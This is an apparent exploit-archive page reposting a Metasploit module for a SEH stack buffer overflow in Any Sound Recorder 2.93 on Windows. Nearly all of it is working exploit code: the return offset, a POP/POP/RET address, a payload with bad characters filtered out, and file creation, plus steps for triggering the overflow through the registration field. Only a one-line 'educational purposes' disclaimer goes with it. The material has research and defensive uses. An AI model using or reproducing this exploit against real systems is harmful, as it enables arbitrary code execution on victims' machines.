Any sound recorder 2.93 buffer overflow local (seh) (metasploit) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2018-10-30 | Type : local | Platform : windows
This exploit / vulnerability Any sound recorder 2.93 buffer overflow local (seh) (metasploit) is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Seh

def initialize(info = {})
super(update_info(info,
'Name' => 'Any Sound Recorder 2.93 Buffer Overflow (SEH)',
'Description' => %q{
This module exploits a stack based buffer overflow in Any Sound Recorder 2.93, when
with the name "hack.txt". Copy the content of the "hack.txt",Start Any Sound Recorder 2.93 click "Enter Key Code" Paste the content into field "User Name" click "Register"
},
'License' => MSF_LICENSE,
'Author' =>
[
'Abdullah Alıç', # Original discovery
'd3ckx1 d3ck(at)qq.com', # MSF module
],
'References' =>
[
[ 'OSVDB', '' ],
[ 'EBD', '45627' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process'
},
'Platform' => 'win',
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d",
'DisableNops' => true,
'Space' => 10000
},
'Targets' =>
[
[ 'Any Sound Recorder 2.93',
{
'Ret' => 0x72d12f35, # 0x72d12f35 : P/P/R FROM msacm32.drv form winxp sp3
'Offset' => 900
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Oct 25 2018',
'DefaultTarget' => 0))

register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.txt']),], self.class)

end

def exploit
buf = "\x90"*(target['Offset'])
buf << "\xeb\x06#{Rex::Text.rand_text_alpha(2, payload_badchars)}" # nseh (jmp to payload)
buf << [target.ret] .pack('V') # seh
buf << make_nops(10)
buf << payload.encoded
buf << "\x90" * 200

file_create(buf)
handler

end
end